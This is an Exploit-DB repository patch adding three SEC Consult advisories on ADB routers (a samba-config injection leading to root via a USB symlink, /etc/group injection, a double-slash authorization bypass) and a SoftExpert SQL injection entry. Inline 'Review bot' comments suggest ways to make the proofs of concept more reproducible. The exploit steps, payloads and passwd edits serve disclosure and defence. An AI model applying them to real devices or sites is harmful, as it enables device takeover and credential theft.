From 08110782dd5c1472107d9bd0961ea6a3b6ff52ec Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 6 Jul 2018 05:01:46 +0000 Subject: [PATCH] DB: 2018-07-06 4 changes to exploits/shellcodes ADB Broadband Gateways / Routers - Local Root Jailbreak ADB Broadband Gateways / Routers - Privilege Escalation ADB Broadband Gateways / Routers - Authorization Bypass SoftExpert Excellence Suite 2.0 - 'cddocument' SQL Injection --- exploits/hardware/local/44983.txt | 288 ++++++++++++++++++++++++++++ exploits/hardware/local/44984.txt | 192 +++++++++++++++++++ exploits/hardware/webapps/44982.txt | 167 ++++++++++++++++ exploits/php/webapps/44981.txt | 21 ++ files_exploits.csv | 4 + 5 files changed, 672 insertions(+) create mode 100644 exploits/hardware/local/44983.txt create mode 100644 exploits/hardware/local/44984.txt create mode 100644 exploits/hardware/webapps/44982.txt create mode 100644 exploits/php/webapps/44981.txt diff --git a/exploits/hardware/local/44983.txt b/exploits/hardware/local/44983.txt new file mode 100644 index 000000000..750e14d74 --- /dev/null +++ b/exploits/hardware/local/44983.txt 
@@ -0,0 +1,288 @@ +SEC Consult Vulnerability Lab Security Advisory < 20180704-0 > +======================================================================= +title: Local root jailbreak via network file sharing flaw +product: All ADB Broadband Gateways / Routers +(based on Epicentro platform) +vulnerable version: Hardware: ADB P.RG AV4202N, DV2210, VV2220, VV5522, etc. +fixed version: see "Solution" section below +CVE number: CVE-2018-13108 +impact: critical +homepage: http://www.adbglobal.com +found: 2016-06-09 +by: Johannes Greil (Office Vienna) +SEC Consult Vulnerability Lab + +An integrated part of SEC Consult +Europe | Asia | North America + +https://www.sec-consult.com +======================================================================= + +Vendor description: +------------------- +"ADB creates and delivers the right solutions that enable our customers to +reduce integration and service delivery challenges to increase ARPU and reduce +churn. We combine ADB know-how and products with those from a number of third +party industry leaders to deliver complete solutions that benefit from +collaborative thinking and best in class technologies." + +Source: https://www.adbglobal.com/about-adb/ + +"Founded in 1995, ADB initially focused on developing and marketing software +for digital TV processors and expanded its business to the design and +manufacture of digital TV equipment in 1997. The company sold its first set-top +box in 1997 and since then has been delivering a number of set-top boxes, and +Gateway devices, together with advanced software platforms. ADB has sold over +60 million devices worldwide to cable, satellite, IPTV and broadband operators. +ADB employs over 500 people, of which 70% are in engineering functions." 
+ +Source: https://en.wikipedia.org/wiki/Advanced_Digital_Broadcast + +Business recommendation: +------------------------ +By exploiting the local root vulnerability on affected and unpatched devices +an attacker is able to gain full access to the device with highest privileges. +Attackers are able to modify any settings that might have otherwise been +prohibited by the ISP. It is possible to retrieve all stored user credentials +(such as VoIP) or SSL private keys. Furthermore, attacks on the internal network +side of the ISP are possible by using the device as a jump host, depending on +the internal network security measures. + +Network security should not depend on the security of independent devices, +such as modems. An attacker with root access to such a device can enable +attacks on connected networks, such as administrative networks managed by the +ISP or other users. + +It is highly recommended by SEC Consult to perform a thorough security review +by security professionals for this platform. It is assumed that further critical +vulnerabilities exist within the firmware of this device. + +Vulnerability overview/description: +----------------------------------- +1) Local root jailbreak via network file sharing flaw (CVE-2018-13108) +Most ADB devices offer USB ports in order for customers to use them for +printer or file sharing. In the past, ADB devices have suffered from symlink +attacks e.g. via FTP server functionality which has been fixed in more recent +firmware versions. + +The "Network File Sharing" feature of current ADB devices via USB uses a samba +daemon which accesses the USB drive with highest access rights and exports the +network shares with root user permissions. The default and hardcoded setting +for the samba daemon within the smb.conf on the device has set "wide links = +no" which normally disallows gaining access to the root file system of the +device using symlink attacks via a USB drive. 
+ +But an attacker is able to exploit both a web GUI input validation and samba +configuration file parsing problem which makes it possible to access the root +file system of the device with root access rights via a manipulated USB drive. + +The attacker can then edit various system files, e.g. passwd and session +information of the web server in order to escalate web GUI privileges and +start a telnet server and gain full system level shell access as root. + +This is a local attack and not possible via remote access vectors as an +attacker needs to insert a specially crafted USB drive into the device! +Usually not even the ISPs themselves have direct root access on ADB devices +hence this attack is quite problematic for further internal attacks. + +It is possible to change network routes and attack networks and systems within +the internal network of the ISP or add backdoors or sniffers to the device. + +Furthermore, attackers are able to gain access to all stored credentials, +such as PPP, wireless, CPE management or VoIP passwords. + +Proof of concept: +----------------- +1) Local root jailbreak via network file sharing flaw (CVE-2018-13108) +The samba configuration file (smb.conf) of the ADB devices has set the +following default settings. All file system operations will be performed +by the root user as set in the "force user" / "force group" setting of the +exported share: + +[global] +netbios name = HOSTNAME +workgroup = WORKGROUP +wide links = no +smb ports = 445 139 +security = share +guest account = root +announce version = 5.0 +socket options = TCP_NODELAY SO_RCVBUF=65536 SO_SNDBUF=65536 +null passwords = yes +name resolve order = hosts wins bcast +wins support = yes +syslog only = yes +read only = no +hosts allow = 192.168.1.1/255.255.255.0 +[share] +path = /mnt/sdb1/. +read only = false +force user = root +force group = root +guest ok = yes + +An attacker can edit various values such as "netbios name" and "workgroup" via +the web GUI. 
The web GUI does some basic filtering and newlines are +unfortunately not allowed (the samba config file is line-based) hence a +special bypass has been crafted in order to change the default setting "wide +links = no" to "wide links = yes". This enables symlinks to the root file +system. + +By using the following netbios name and workgroup, samba can be tricked into +allowing symlinks to the root file system of the device: +netbios domain / workgroup = =wide links = yes \ netbios name = wide links = yes +Relevant HTTP POST parameters: +&domainName==wide links = yes \ \ &hostName=wide+links+%3D+yes+%5C + +According to the manpage of smb.conf, any line ending in a \ is continued by the +samba parser on the next line. Furthermore, it states that "Only the first +equals sign in a parameter is significant." - which it seems can be bypassed +by adding a backslash \. The parser now thinks that the "wide links = yes" has +been set and omits the hardcoded "wide links = no" which comes further down +below in the smb.conf file. + +In order to add those special values within the web GUI a proxy server such as +burp proxy is needed because of basic input validation on the client side (not +server side). + +The USB drive needs to be formatted to ext2 or ext3 which is supported by +the ADB device. Then create a symlink to the root file system via the +following command on the attacker's computer: +ln -s / /path/to/usbdevice/rootfs + +After those settings have been changed and the USB drive has been set up, +the USB drive can be inserted into the ADB device. The USB volume needs to be +exported (with read/write permissions) as a share via the web GUI. Afterwards +it can be accessed over the network and the "rootfs" folder example from above +will give an attacker access to the ADB root file system with "read & write" +access permissions as root. 
+ +Most file systems / partitions on the device are mounted read-only per default, +but the most important one "/tmp" contains all settings and is mounted writable +for operations. + +The defaut user "admin" usually has little access rights during normal +operations which can be changed by manipulating the session file of the web +server within /tmp/ui_session_XXX where XXX is the session id of the currently +logged on user, e.g. change: +from: access.dboard/settings/management/telnetserver =|> 2001 +to: access.dboard/settings/management/telnetserver =|> 2220 +etc. (or change all entries for maximum access level) + +This way, an attacker can give himself all/highest access permissions within +the GUI and change all the settings of the device! Hence the telnet or SSH +server can be started even though they might have been disabled by the ISP. +Furthermore, the /tmp/passwd file has to be changed in order to allow root +access via shell/telnet: +change: root:*:0:0:root:/root:/bin/ash +to: root::0:0:root:/root:/bin/ash + +Now telnet into the device with root and no password. +Example of an ADB DV2210 device: + +Trying $IP... +Connected to $IP. +Escape character is '^]'. +Login root: + +BusyBox v1.17.3 (2016-02-11 13:34:33 CET) built-in shell (ash) +Enter 'help' for a list of built-in commands. + +___ ___ ___ ___ +|\__\ /\ \ /\ \ /\ |:| | /::\ \ /::\ \ /::\ |:| | /:/\:\ \ /:/\:\ \ /:/\:\ |:|__|__ /::\~\:\ \ /::\~\:\ \ _\:\~\:\ /::::\__\ /:/\:\ \:\__\ /:/\:\ \:\__\ /\ \:\ \:\__ /:/~~/~ \/__\:\/:/ / \/__\:\/:/ / \:\ \:\ \/__/ +/:/ / \::/ / \::/ / \:\ \:\__ \/__/ /:/ / \/__/ \:\/:/ / +/:/ / \::/ / +\/__/ \/__/ +.................................................................. +yet another purposeful solution by A D B Broadband +.................................................................. 
+root@$hostname:~# id +uid=0(root) gid=0(root) groups=0(root) +root@$hostname:~# + +Vulnerable / tested versions: +----------------------------- +The following devices & firmware have been tested which were the most recent +versions at the time of discovery. + +The firmware versions depend on the ISP / customer of ADB and may vary! + +ADB P.RG AV4202N - E_3.3.0, latest firmware version, depending on ISP +ADB DV 2210 - E_5.3.0, latest firmware version, depending on ISP +ADB VV 5522 - E_8.3.0, latest firmware version, depending on ISP +ADB VV 2220 - E_9.0.6, latest firmware version, depending on ISP +etc. + +It has been confirmed by ADB that _all_ their ADB modems / gateways / routers +based on the Epicentro platform with USB ports and network file sharing +features are affected by this vulnerability in all firmware versions for all +their customers (ISPs) at the time of identification of the vulnerability. + +Vendor contact timeline: +------------------------ +2016-06-15: Contacting vendor ADB, exchanging encryption keys & advisory +Asking about affected devices / firmware, timeline for hotfix +Fast initial response from ADB providing requested information +2016-06-16: Asking about other affected devices +2016-06-17: Resending previous question due to encryption problems +2016-07-04: Conference call +2016-07 - 2017-04: Further coordination, waiting for firmware release, +implementation & rollout phases for their customers +2018-07-04: Embargo lifted, public release of security advisory + +Solution: +--------- +The firmware versions depend on the ISP / customer of ADB and may vary! + +Patch version: + +ADB P.RG AV4202N >= E_3.3.2, firmware version depending on ISP +ADB DV2210 >= E_5.3.2, firmware version depending on ISP +ADB VV5522 >= E_8.3.2, firmware version depending on ISP +ADB VV2220 >= E_9.3.2, firmware version depending on ISP + +Centro Business 1 >= 7.12.10 +Centro Business 2 >= 8.06.08 + +etc. 
+ +Workaround: +----------- +Restrict access to the web interface and only allow trusted users. +Change any default/weak passwords to strong credentials. +Don't allow remote access to the web GUI via Internet. + +Advisory URL: +------------- +https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +SEC Consult Vulnerability Lab + +SEC Consult +Europe | Asia | North America + +About SEC Consult Vulnerability Lab +The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It +ensures the continued knowledge gain of SEC Consult in the field of network +and application security to stay ahead of the attacker. The SEC Consult +Vulnerability Lab supports high-quality penetration testing and the evaluation +of new offensive and defensive technologies for our customers. Hence our +customers obtain the most current information about vulnerabilities and valid +recommendation about the risk profile of new technologies. + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Interested to work with the experts of SEC Consult? +Send us your application https://www.sec-consult.com/en/career/index.html + +Interested in improving your cyber security with the experts of SEC Consult? +Contact our local offices https://www.sec-consult.com/en/contact/index.html +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Mail: research at sec-consult dot com +Web: https://www.sec-consult.com +Blog: http://blog.sec-consult.com +Twitter: https://twitter.com/sec_consult + +EOF J. Greil / @2018 \ No newline at end of file diff --git a/exploits/hardware/local/44984.txt b/exploits/hardware/local/44984.txt new file mode 100644 index 000000000..dc8f6dc47 --- /dev/null +++ b/exploits/hardware/local/44984.txt 
@@ -0,0 +1,192 @@ +SEC Consult Vulnerability Lab Security Advisory < 20180704-2 > +======================================================================= +title: Privilege escalation via linux group manipulation +product: All ADB Broadband Gateways / Routers +(based on Epicentro platform) +vulnerable version: Hardware: ADB P.RG AV4202N, DV2210, VV2220, VV5522, etc. +fixed version: see "Solution" section below +CVE number: CVE-2018-13110 +impact: critical +homepage: http://www.adbglobal.com +found: 2016-07-11 +by: Stefan Viehböck (Office Vienna) +Johannes Greil (Office Vienna) +SEC Consult Vulnerability Lab + +An integrated part of SEC Consult +Europe | Asia | North America + +https://www.sec-consult.com +======================================================================= + +Vendor description: +------------------- +"ADB creates and delivers the right solutions that enable our customers to +reduce integration and service delivery challenges to increase ARPU and reduce +churn. We combine ADB know-how and products with those from a number of third +party industry leaders to deliver complete solutions that benefit from +collaborative thinking and best in class technologies." + +Source: https://www.adbglobal.com/about-adb/ + +"Founded in 1995, ADB initially focused on developing and marketing software +for digital TV processors and expanded its business to the design and +manufacture of digital TV equipment in 1997. The company sold its first set-top +box in 1997 and since then has been delivering a number of set-top boxes, and +Gateway devices, together with advanced software platforms. ADB has sold over +60 million devices worldwide to cable, satellite, IPTV and broadband operators. +ADB employs over 500 people, of which 70% are in engineering functions." 
+ +Source: https://en.wikipedia.org/wiki/Advanced_Digital_Broadcast + +Business recommendation: +------------------------ +By exploiting the group manipulation vulnerability on affected and unpatched +devices an attacker is able to gain access to the command line interface (CLI) +if previously disabled by the ISP. + +Depending on the feature-set of the CLI (ISP dependent) it is then possible to +gain access to the whole configuration and manipulate settings in the web GUI +and escalate privileges to highest access rights. + +It is highly recommended by SEC Consult to perform a thorough security review +by security professionals for this platform. It is assumed that further critical +vulnerabilities exist within the firmware of this device. + +Vulnerability overview/description: +----------------------------------- +1) Privilege escalation via linux group manipulation (CVE-2018-13110) +An attacker with standard / low access rights within the web GUI is able to +gain access to the CLI (if it has been previously disabled by the configuration) +and escalate his privileges. + +Depending on the CLI features it is possible to extract the whole configuration +and manipulate settings or gain access to debug features of the device, e.g. +via "debug", "upgrade", "upload" etc. commands in the CLI. + +Attackers can gain access to sensitive configuration data such as VoIP +credentials or other information and manipulate any settings of the device. + +Proof of concept: +----------------- +1) Privilege escalation via linux group manipulation (CVE-2018-13110) +It is possible to manipulate the group name setting of "Storage users" and +overwrite the local linux groups called "remoteaccess" or "localaccess" in +(in /etc/group) which define access to Telnet or SSH on the ADB devices. + +It may be possible to overwrite the "root" group as well but it may brick the +device and the default user is already within the "root" group. Hence this +attack has not been further tested. 
+ +The following steps describe the attack: +a) Add a new group called "localaccess" via the web GUI here: +http://$IP/ui/dboard/storage/storageusers?backto=storage + +This will generate the following new group in /etc/group. The original +"localaccess" group will overwritten. + +localaccess:Storage Group:5001: + +b) Then delete this group via the web GUI again, the entry will be removed +from /etc/group completely. + +c) Afterwards, create the following new group name entry via the web GUI and +add your user account (e.g. admin) which should have access to Telnet/SSH +now: + +localaccess:x:20:root,admin, + +d) Now the admin user has been added to the "localaccess" group and the "admin" +account is allowed to login via SSH or Telnet. Excerpt of new /etc/group: + +localaccess:x:20:root,admin,:Storage Group:5001: + +Further attacks on the CLI interface will not be described in detail within +this advisory. It is possible to add new user accounts with highest access rights +("newuser" command) or upload the whole configuration to a remote FTP server +("upload" command). The available feature-set of the CLI depends on the firmware +version. +The XML configuration is encrypted, but can be easily decrypted with access to the +firmware. Then it can be manipulated and uploaded to the device again ("upgrade" +command) which allows privilege escalation by changing permissions or roles +within this file. + +Vulnerable / tested versions: +----------------------------- +The following specific devices & firmware have been tested which were the most +recent versions at the time of discovery: + +The firmware versions depend on the ISP / customer of ADB and may vary! + +ADB P.RG AV4202N - E_3.3.0, firmware version depending on ISP +ADB DV 2210 - E_5.3.0, firmware version depending on ISP +ADB VV 5522 - E_8.3.0, firmware version depending on ISP +ADB VV 2220 - E_9.0.6, firmware version depending on ISP +etc. 
+ +It has been confirmed by ADB that _all_ their ADB modems / gateways / routers +based on the Epicentro platform are affected by this vulnerability in all +firmware versions for all their customers (ISPs) at the time of identification +of the vulnerability _except_ those devices which have a custom UI developed +for the ISP. + +Vendor contact timeline: +------------------------ +2016-07-12: Contacting vendor ADB, sending encrypted advisory, asking about +affected devices +2016-07 - 2017-04: Further coordination, waiting for firmware release, +implementation & rollout phases for their customers +2018-07-04: Embargo lifted, public release of security advisory + +Solution: +--------- +The firmware versions depend on the ISP / customer of ADB and may vary! + +Patch version: + +ADB P.RG AV4202N >= E_3.3.2, firmware version depending on ISP +ADB DV2210 >= E_5.3.2, firmware version depending on ISP +ADB VV5522 >= E_8.3.2, firmware version depending on ISP +ADB VV2220 >= E_9.3.2, firmware version depending on ISP +etc. + +Workaround: +----------- +Restrict access to the web interface and only allow trusted users. +Change any default/weak passwords to strong credentials. +Don't allow remote access to the web GUI via Internet. + +Advisory URL: +------------- +https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +SEC Consult Vulnerability Lab + +SEC Consult +Europe | Asia | North America + +About SEC Consult Vulnerability Lab +The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It +ensures the continued knowledge gain of SEC Consult in the field of network +and application security to stay ahead of the attacker. The SEC Consult +Vulnerability Lab supports high-quality penetration testing and the evaluation +of new offensive and defensive technologies for our customers. 
Hence our +customers obtain the most current information about vulnerabilities and valid +recommendation about the risk profile of new technologies. + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Interested to work with the experts of SEC Consult? +Send us your application https://www.sec-consult.com/en/career/index.html + +Interested in improving your cyber security with the experts of SEC Consult? +Contact our local offices https://www.sec-consult.com/en/contact/index.html +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Mail: research at sec-consult dot com +Web: https://www.sec-consult.com +Blog: http://blog.sec-consult.com +Twitter: https://twitter.com/sec_consult + +EOF J. Greil / @2018 \ No newline at end of file diff --git a/exploits/hardware/webapps/44982.txt b/exploits/hardware/webapps/44982.txt new file mode 100644 index 000000000..051ee5c4a --- /dev/null +++ b/exploits/hardware/webapps/44982.txt 
@@ -0,0 +1,167 @@ +SEC Consult Vulnerability Lab Security Advisory < 20180704-1 > +======================================================================= +title: Authorization Bypass +product: All ADB Broadband Gateways / Routers +(based on Epicentro platform) +vulnerable version: Hardware: ADB P.RG AV4202N, DV2210, VV2220, VV5522, etc. +fixed version: see "Solution" section below +CVE number: CVE-2018-13109 +impact: critical +homepage: http://www.adbglobal.com +found: 2016-06-28 +by: Johannes Greil (Office Vienna) +SEC Consult Vulnerability Lab + +An integrated part of SEC Consult +Europe | Asia | North America + +https://www.sec-consult.com +======================================================================= + +Vendor description: +------------------- +"ADB creates and delivers the right solutions that enable our customers to +reduce integration and service delivery challenges to increase ARPU and reduce +churn. We combine ADB know-how and products with those from a number of third +party industry leaders to deliver complete solutions that benefit from +collaborative thinking and best in class technologies." + +Source: https://www.adbglobal.com/about-adb/ + +"Founded in 1995, ADB initially focused on developing and marketing software +for digital TV processors and expanded its business to the design and +manufacture of digital TV equipment in 1997. The company sold its first set-top +box in 1997 and since then has been delivering a number of set-top boxes, and +Gateway devices, together with advanced software platforms. ADB has sold over +60 million devices worldwide to cable, satellite, IPTV and broadband operators. +ADB employs over 500 people, of which 70% are in engineering functions." 
+ +Source: https://en.wikipedia.org/wiki/Advanced_Digital_Broadcast + +Business recommendation: +------------------------ +By exploiting the authorization bypass vulnerability on affected and unpatched +devices an attacker is able to gain access to settings that are otherwise +forbidden for the user, e.g. through strict settings set by the ISP. It is also +possible to manipulate settings to e.g. enable the telnet server for remote +access if it had been previously disabled by the ISP. The attacker needs some +user account, regardless of the permissions, for login, e.g. the default one +provided by the ISP or printed on the device can be used. + +It is highly recommended by SEC Consult to perform a thorough security review +by security professionals for this platform. It is assumed that further critical +vulnerabilities exist within the firmware of this device. + +Vulnerability overview/description: +----------------------------------- +1) Authorization bypass vulnerability (CVE-2018-13109) +Depending on the firmware version/feature-set of the ISP deploying the ADB +device, a standard user account may not have all settings enabled within +the web GUI. + +An authenticated attacker is able to bypass those restrictions by adding a +second slash in front of the forbidden entry of the path in the URL. +It is possible to access forbidden entries within the first layer of the web +GUI, any further subsequent layers/paths (sub menus) were not possible to access +during testing but further exploitation can't be ruled out entirely. 
+ +Proof of concept: +----------------- +1) Authorization bypass vulnerability (CVE-2018-13109) +Assume the following URL is blocked/forbidden within the web GUI settings: +http://$IP/ui/dboard/settings/management/telnetserver + +Adding a second slash in front of the blocked entry "telnetserver" will enable +full access including write permissions to change settings: +http://$IP/ui/dboard/settings/management//telnetserver + +This works for many other settings within the web GUI! + +In our tests it was not possible to access subsequent layers, e.g.: +Assume that both the proxy menu and submenu "rtsp" settings are blocked, +a second slash will _not_ enable access to the RTSP settings: +http://$IP/ui/dboard/settings/proxy//rtsp + +Nevertheless, it can't be ruled out that sub menus can be accessed too when +further deeper tests are being performed. + +Vulnerable / tested versions: +----------------------------- +The following devices & firmware have been tested which were the most recent +versions at the time of discovery: + +The firmware versions depend on the ISP / customer of ADB and may vary! + +ADB P.RG AV4202N - E_3.3.0, latest firmware version, depending on ISP +ADB DV 2210 - E_5.3.0, latest firmware version, depending on ISP +ADB VV 5522 - E_8.3.0, latest firmware version, depending on ISP +ADB VV 2220 - E_9.0.6, latest firmware version, depending on ISP +etc. + +It has been confirmed by ADB that _all_ their ADB modems / gateways / routers +based on the Epicentro platform are affected by this vulnerability in all +firmware versions for all their customers (ISPs) at the time of identification +of the vulnerability _except_ those devices which have a custom UI developed +for the ISP. 
+ +Vendor contact timeline: +------------------------ +2016-07-01: Contacting vendor ADB, sending encrypted advisory, asking about +affected devices +2016-07-08: Receiving information about affected devices +2016-07 - 2017-04: Further coordination, waiting for firmware release, +implementation & rollout phases for their customers +2018-07-04: Embargo lifted, public release of security advisory + +Solution: +--------- +The firmware versions depend on the ISP / customer of ADB and may vary! + +Patch version: + +ADB P.RG AV4202N >= E_3.3.2, firmware version depending on ISP +ADB DV2210 >= E_5.3.2, firmware version depending on ISP +ADB VV5522 >= E_8.3.2, firmware version depending on ISP +ADB VV2220 >= E_9.3.2, firmware version depending on ISP +etc. + +Workaround: +----------- +Restrict access to the web interface and only allow trusted users. +Change any default/weak passwords to strong credentials. +Don't allow remote access to the web GUI via Internet. + +Advisory URL: +------------- +https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +SEC Consult Vulnerability Lab + +SEC Consult +Europe | Asia | North America + +About SEC Consult Vulnerability Lab +The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It +ensures the continued knowledge gain of SEC Consult in the field of network +and application security to stay ahead of the attacker. The SEC Consult +Vulnerability Lab supports high-quality penetration testing and the evaluation +of new offensive and defensive technologies for our customers. Hence our +customers obtain the most current information about vulnerabilities and valid +recommendation about the risk profile of new technologies. + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Interested to work with the experts of SEC Consult? 
+Send us your application https://www.sec-consult.com/en/career/index.html + +Interested in improving your cyber security with the experts of SEC Consult? +Contact our local offices https://www.sec-consult.com/en/contact/index.html +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Mail: research at sec-consult dot com +Web: https://www.sec-consult.com +Blog: http://blog.sec-consult.com +Twitter: https://twitter.com/sec_consult + +EOF J. Greil / @2018 \ No newline at end of file diff --git a/exploits/php/webapps/44981.txt b/exploits/php/webapps/44981.txt new file mode 100644 index 000000000..19b7f3e34 --- /dev/null +++ b/exploits/php/webapps/44981.txt @@ -0,0 +1,21 @@ +# Exploit Title: SoftExpert Excellence Suite 2.0 - 'cddocument' SQL Injection +# Author: Seren PORSUK +# Date: 2018-06-28 +# Type: webapps +# Platform: PHP +# CVE= N/A +# Vendor Homepage : https://www.softexpert.com/solucao/softexpert-excellence-suite/ + +# DETAILS +# A SQL injection vulnerability in the SoftExpert (SE) Excellence Suite 2.0 +# allows remote authenticated users to perform SQL heuristics by pulling +# information from the database with the "cddocument" parameter in the +# "Downloading Electronic Documents" section. + +# Vulnerable Parameter Type : GET +# Vulnerable Parameter : cddocument + +#Vulnerable URL : +http://localhost/se/v75408/generic/gn_eletronicfile_view/1.1/view_eletronic_download.php?class_name=dc_eletronic_file&classwaybusinessrule=class.dc_eletronic_file.inc&action=4&cddocument=[SQLi]&saveas1&mainframe=1&cduser=6853 + +#SQLi Parameter : 2 AND 1=2 \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index a02c4acab..9fa5c04a5 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
@@ -9803,6 +9803,8 @@ id,file,description,date,author,type,platform,port 44920,exploits/linux/local/44920.txt,"Dell EMC RecoverPoint < 5.1.2 - Local Root Command Execution",2018-06-21,"Paul Taylor",local,linux, 44961,exploits/windows/local/44961.txt,"Enhanced Mitigation Experience Toolkit (EMET) - XML External Entity Injection",2018-07-02,hyp3rlinx,local,windows, 44971,exploits/windows/local/44971.rb,"Boxoft WAV to MP3 Converter 1.1 - Buffer Overflow (Metasploit)",2018-07-03,Metasploit,local,windows, +44983,exploits/hardware/local/44983.txt,"ADB Broadband Gateways / Routers - Local Root Jailbreak",2018-07-05,"SEC Consult",local,hardware, +44984,exploits/hardware/local/44984.txt,"ADB Broadband Gateways / Routers - Privilege Escalation",2018-07-05,"SEC Consult",local,hardware, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 
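Review bot: the two rows added after 44971 carry the date 2018-07-05 and the author "SEC Consult", while the advisories in this same patch give 2018-07-04 as the public release date and credit Johannes Greil (and Stefan Viehböck for 44984); the neighbouring rows in this block credit individual researchers ("Paul Taylor", hyp3rlinx), so either change the author field to match that convention or confirm that the column is meant to name the publishing organisation, and confirm which date the date column is supposed to carry. The empty port field matches the surrounding local rows and is fine.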
@@ -39599,6 +39601,7 @@ id,file,description,date,author,type,platform,port 44924,exploits/php/webapps/44924.txt,"phpMyAdmin 4.8.1 - (Authenticated) Local File Inclusion (1)",2018-06-21,ChaMd5,webapps,php,80 44926,exploits/php/webapps/44926.txt,"phpLDAPadmin 1.2.2 - 'server_id' LDAP Injection (Username)",2018-06-22,"Berk Dusunur",webapps,php,80 44928,exploits/php/webapps/44928.txt,"phpMyAdmin 4.8.1 - (Authenticated) Local File Inclusion (2)",2018-06-22,VulnSpy,webapps,php,80 +44982,exploits/hardware/webapps/44982.txt,"ADB Broadband Gateways / Routers - Authorization Bypass",2018-07-05,"SEC Consult",webapps,hardware,80 44931,exploits/php/webapps/44931.txt,"WordPress Plugin Advanced Order Export For WooCommerce < 1.5.4 - CSV Injection",2018-06-25,"Bhushan B. Patil",webapps,php,80 44932,exploits/linux/webapps/44932.txt,"Ecessa Edge EV150 10.7.4 - Cross-Site Request Forgery (Add Superuser)",2018-06-25,LiquidWorm,webapps,linux,443 44933,exploits/hardware/webapps/44933.txt,"Intex Router N-150 - Cross-Site Request Forgery (Add Admin)",2018-06-25,"Samrat Das",webapps,hardware,80 @@ -39623,3 +39626,4 @@ id,file,description,date,author,type,platform,port 44976,exploits/php/webapps/44976.py,"CMS Made Simple 2.2.5 - Remote Code Execution",2018-07-04,"Mustafa Hasan",webapps,php, 44977,exploits/php/webapps/44977.txt,"Online Trade - Information Disclosure",2018-07-04,L0RD,webapps,php, 44978,exploits/php/webapps/44978.txt,"ShopNx - Arbitrary File Upload",2018-07-04,L0RD,webapps,php, +44981,exploits/php/webapps/44981.txt,"SoftExpert Excellence Suite 2.0 - 'cddocument' SQL Injection",2018-07-05,"Seren PORSUK",webapps,php,80
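Review bot: in the 44983.txt hunk, the two representations of the injected samba values disagree, which makes the PoC hard to reproduce as written. The prose line gives "netbios domain / workgroup = =wide links = yes \" with one trailing backslash and "netbios name = wide links = yes" with none, while the request line "&domainName==wide links = yes \ \ &hostName=wide+links+%3D+yes+%5C" sends the domain value raw with two backslashes and the host value URL-encoded with one; show a single fully URL-encoded request so the reader knows which bytes actually reach the server. The explanation of the parse is also hedged ("which it seems can be bypassed by adding a backslash"), and in the quoted smb.conf the order is netbios name, then workgroup, then wide links, so a continuation backslash on the netbios name value also pulls the workgroup line into it; the effective configuration as samba actually parses it (for example testparm output taken on the device) would be stronger evidence than the inferred reading. Minor: "The defaut user" should read "The default user", and the file is committed without a trailing newline ("\ No newline at end of file"), as are the other three new files.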
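Review bot: in the 44984.txt hunk, steps a) and b) are given without their purpose; state that they exist to get the original localaccess line out of /etc/group so that the entry injected in step c) is the only record for that name, otherwise the reader cannot tell why step c) alone is not enough. The root cause is also never named in the overview: the "Storage users" group name is written into /etc/group verbatim, so a name containing ':' and ',' ("localaccess:x:20:root,admin,") becomes a complete group record, and the trailing ":Storage Group:5001:" that the GUI appends is harmless only because everything after the third colon is read as the comma-separated member list, in which admin already appears. Grammar: "The original "localaccess" group will overwritten" should read "will be overwritten".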
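Review bot: in the 44982.txt hunk, the Workaround section repeats the text of the other two advisories and does not address this issue: the attacker here is an authenticated user with the ISP-provided default account "regardless of the permissions", so restricting the web GUI to trusted users and changing weak passwords does not stop such a user from requesting "/ui/dboard/settings/management//telnetserver"; say plainly that only the firmware update listed under Solution removes the bypass. It would also help to name the likely cause: the session-file key "access.dboard/settings/management/telnetserver" quoted in 44983.txt in this same patch suggests the permission check is keyed on the literal request path, which is why a path with an extra slash is not matched while the handler still resolves the page, and the fix is to normalise the path before the authorization lookup. The file ends without a trailing newline.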
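Review bot: in the 44981.txt hunk, the description claims the attacker can "perform SQL heuristics by pulling information from the database", but the only payload given is "2 AND 1=2", which is a boolean-based blind test, and the file never says what differs in the response between a true and a false condition (for instance whether the download for document 2 still succeeds with "2 AND 1=1"); without that, the reader has no way to confirm the injection. The example URL also contains "saveas1" where every other parameter is name=value, which looks like a truncated "saveas=1", and it hard-codes an install-specific path segment ("v75408") and "cduser=6853" without saying they must be adapted; "CVE= N/A" should follow the "Key: value" form used by the other header lines. The file ends without a trailing newline.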
